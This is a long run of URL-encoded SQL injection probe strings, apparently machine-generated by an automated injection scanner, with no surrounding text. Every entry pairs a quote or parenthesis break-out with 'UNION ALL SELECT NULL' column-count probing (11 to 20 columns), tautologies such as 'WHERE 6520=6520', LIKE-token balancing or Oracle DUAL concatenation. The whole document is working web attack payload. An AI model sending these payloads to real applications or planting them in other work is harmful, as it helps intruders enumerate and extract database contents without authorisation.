1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22AOcT%22%20LIKE%20%22AOcT 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22NTcF%22%20LIKE%20%22NTcF 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22Irha%22%20LIKE%20%22Irha 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22rRJB%22%20LIKE%20%22rRJB 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22UOIL%22%20LIKE%20%22UOIL 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22ItYn%22%20LIKE%20%22ItYn 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22HNKs%22%20LIKE%20%22HNKs 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22Ujee%22%20LIKE%20%22Ujee 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22JLQU%22%20LIKE%20%22JLQU 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22CfuW%22%20LIKE%20%22CfuW 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22knBU%22%20LIKE%20%22knBU 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22cEAL%22%20LIKE%20%22cEAL 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22UQKD%22%20LIKE%20%22UQKD 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22qRdX%22%20LIKE%20%22qRdX 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22DpoW%22%20LIKE%20%22DpoW 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22gjvG%22%20LIKE%20%22gjvG 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22eMtc%22%20LIKE%20%22eMtc 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22yatr%22%20LIKE%20%22yatr 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22yfBL%22%20LIKE%20%22yfBL 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22prTm%22%20LIKE%20%22prTm 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22PdIt%22%20LIKE%20%22PdIt 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22cDKx%22%20LIKE%20%22cDKx 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22sYsF%22%20LIKE%20%22sYsF 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22rOvw%22%20LIKE%20%22rOvw 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22MNqS%22%20LIKE%20%22MNqS 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22EqPd%22%20LIKE%20%22EqPd 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22JUHv%22%20LIKE%20%22JUHv 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22ITza%22%20LIKE%20%22ITza 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22SvWF%22%20LIKE%20%22SvWF 1%29%20WHERE%206520%3D6520%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%209686%3D9686%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%208540%3D8540%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%208810%3D8810%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%205709%3D5709%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%203458%3D3458%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%205185%3D5185%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%207284%3D7284%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%201354%3D1354%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%207602%3D7602%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%203259%3D3259%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%201557%3D1557%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%205795%3D5795%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%208855%3D8855%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%208248%3D8248%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%206399%3D6399%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%201177%3D1177%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%208558%3D8558%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%206175%3D6175%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%202193%3D2193%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%202780%3D2780%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%203456%3D3456%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%203506%3D3506%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%201157%3D1157%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%207361%3D7361%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%206024%3D6024%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%208971%3D8971%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%203000%3D3000%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%206776%3D6776%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%203795%3D3795%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%206861%3D6861%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%201148%3D1148%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%206354%3D6354%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%209840%3D9840%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%204178%3D4178%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%201769%3D1769%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%209576%3D9576%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%207020%3D7020%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%208103%3D8103%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%201426%3D1426%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20%7C%7C%20%28SELECT%202846%20FROM%20DUAL%20WHERE%201320%3D1320%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206677%20FROM%20DUAL%20WHERE%202374%3D2374%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205676%20FROM%20DUAL%20WHERE%203641%3D3641%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202105%20FROM%20DUAL%20WHERE%203837%3D3837%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201030%20FROM%20DUAL%20WHERE%208480%3D8480%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205178%20FROM%20DUAL%20WHERE%205167%3D5167%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203036%20FROM%20DUAL%20WHERE%207584%3D7584%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208619%20FROM%20DUAL%20WHERE%201117%3D1117%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209988%20FROM%20DUAL%20WHERE%201743%3D1743%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204450%20FROM%20DUAL%20WHERE%204319%3D4319%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201345%20WHERE%203875%3D3875%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208075%20WHERE%208175%3D8175%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202786%20WHERE%206567%3D6567%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209154%20WHERE%201771%3D1771%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209310%20WHERE%206805%3D6805%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202072%20WHERE%203567%3D3567%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209334%20WHERE%204789%3D4789%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 